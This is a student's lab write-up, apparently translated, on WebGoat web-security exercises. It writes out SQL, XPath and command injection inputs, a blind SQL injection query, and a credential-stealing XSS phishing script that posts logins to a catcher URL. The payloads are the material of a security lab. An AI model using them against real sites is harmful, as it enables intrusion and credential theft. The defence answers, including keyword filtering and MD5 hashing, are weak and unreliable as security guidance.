2017-2018-2 20155225 "Network countermeasure Technology" Experiment Nine Web Security Foundation

2017-2018-2 20155225 "Network countermeasure Technology" Experiment Nine Web Security Foundation webgoat1.string SQL Injection

The topic is to find a way to get the database owner's credit card number, with Smith login, get Smith's two credit card number,

But how do you get credit card numbers for everyone?

Only the input ‘ or 1 = ‘ 1 is required so that the construction can close the quotation marks and then the or on a permanent, it can block out the previous conditions.

2. Log Spoofing

Inject in this format in user name: Use CR (%0d) and LF (%0a) for a new line. such as input20155225jzy%0d%0aLogin succeeded !

3. Numeric SQL Injection

This topic is also to get all the weather data of the database, but there is no one can input text box what to do?

View the source code of the page, in the Input drop-down box, submit value values to the background, so just add or 1=1 to the back.

Login success:

4. Command Injection

can also be used to modify the page source code method. Add the following commands to execute on the target host: "& Netstat-an & ipconfig"

Visible changes the drop-down box option, which shows the commands we want the system to execute.

Success:

5. Stage 1:string SQL Injection

At first we want to enter ' or 1=1 in the Password box--inject, but fail. Check the Web page source discovery, the Password box input restrictions.

After you modify the password limit, log on successfully:

6. XPATH Injection

This is a personal data query system for staff, and our aim is to see information from other employees.

XPath is a language that looks for information in an XML document. In addition to entering 1 = 1, you need to select an XML node and enter ' a ' = ' A.

So just type in the user name20155225jzy‘ or 1=1 or ‘a‘=‘a

You 20155225jzy can successfully get the employee information you use with the password input.

7. Blind String SQL Injection

Using blind String SQL injection for blasting, it feels so hard, not quite clear logic, so went to see the answer.

The workaround is to find the name by injecting a Boolean expression into the pre-scripted SQL query.

First is the comparison with H: 101 and (SUBSTRING (SELECT name from pins WHERE cc_number= ' 4321432143214321 '), 1, 1) < ' H '); returns false and displays invalid accounts.

The < ' L ' will return true, so we know that the letter is between H and LZ. After a few more queries you can tell that the first letter is J.

In the same vein, the user name will eventually be launched by Jill.

8. Phishing with XSS

With XSS and HTML injection, inject the following HTML into the search box:

</form>  <script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " +                         document.phish.pass.value);}   </script><form name="phish"><br><br><HR>  <H2>This feature requires account login:</H2><br>  <br>Enter Username:<br>  <input type="text" name="user">  <br>Enter Password:<br>  <input type="password" name = "pass"><br>  <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

You will then see a form that allows you to enter your username and password and click Login directly. The webgoat will capture and feed back the incoming information and the attack succeeds.

9. Stored XSS Attacks

This is a storage-type XSS attack. Enter the entry number in the title and the attack succeeds in the message <script>alert("20155225 attack succeed!");</script> .

10. Cross Site Request forgery (CSRF)

Write a URL to entice other users to click, triggering the CSRF attack, we can put the URL in the form of a picture in the message box, when the URL is not visible to other users, the user once click on the image, will trigger a CSRF event.

Basic question answer 1, SQL injection attack principle, how to defend

SQL injection attacks are worth passing through to the Web application by constructing a special input, which is mostly a combination of SQL syntax,

The main reason for executing an attacker's actions through the execution of SQL statements is that the program does not carefully filter user input data, resulting in illegal data intrusion into the system.

Prevention methods:

1, the first to filter the input data, the common keywords of SQL statement: Select or ' "and other characters to filter.

2, the password in the database to encrypt, verify the login password to encrypt and then encrypt the database with the password to compare, if at this time the same is basically safe.

3, the password in the database commonly used MD5 encryption as far as possible in the front and back of the string with the specified character after the encryption, so even if you see the database is also difficult to crack password.

2, the principle of XSS attack, how to defend

XSS is Cross-site scripting, which is called XSS in order to differentiate it from CSS cascading style sheets. is a Web application security vulnerability attack, is a code injection. It allows malicious users to inject code into a Web page, and other users will be affected when they view the page. Such attacks typically include HTML and client-side scripting languages.

The main purpose of XSS attack is to find a way to get the cookie of the target attack website, because the cookie is equivalent to the seesion, and with this information can log on to the website in any PC that can connect to the Internet, and make some damage by landing on the other person's health. Preventive measures to prevent the release of the interface display HTML tags, </> and other symbols escaped
　　
Prevention methods:
　　
When a malicious code value is displayed as the content of a tag: HTML tags and some special characters ("< > &, etc.) are filtered in places where HTML input is not required and converted into characters that are not interpreted by the browser.

When malicious code is displayed as a property of a tag, by using "Truncate attributes to open up new properties or malicious methods: both the single and double quotes that exist in the property itself need to be transcoded, the HTML tags and tag attributes that are entered by the user are whitelisted, and the tags and attributes of some vulnerabilities can be specifically filtered."

3, XSRF attack principle, how to defend

Prevention methods:

(1). Cookie Hashing (all forms contain the same pseudo-random value):

This is probably the simplest solution because an attacker could not obtain a third-party cookie (theoretically), so the data in the form failed to construct: Add a hash value to the form to certify that this is indeed a request sent by the user. Then the hash value is verified on the server side.

(2). Verification Code

The idea of this scenario is that each user submission requires a user to fill out a random string of images on the form.

(3). One-time Tokens (different forms contain a different pseudo-random value)
　　

Summarize

Through this experiment, I learned some basic content of the Web attack, also felt the web security has the very broad exploration space, hoped in the future will have the opportunity to continue to study.

2017-2018-2 20155225 "Network countermeasure Technology" Experiment Nine Web Security Foundation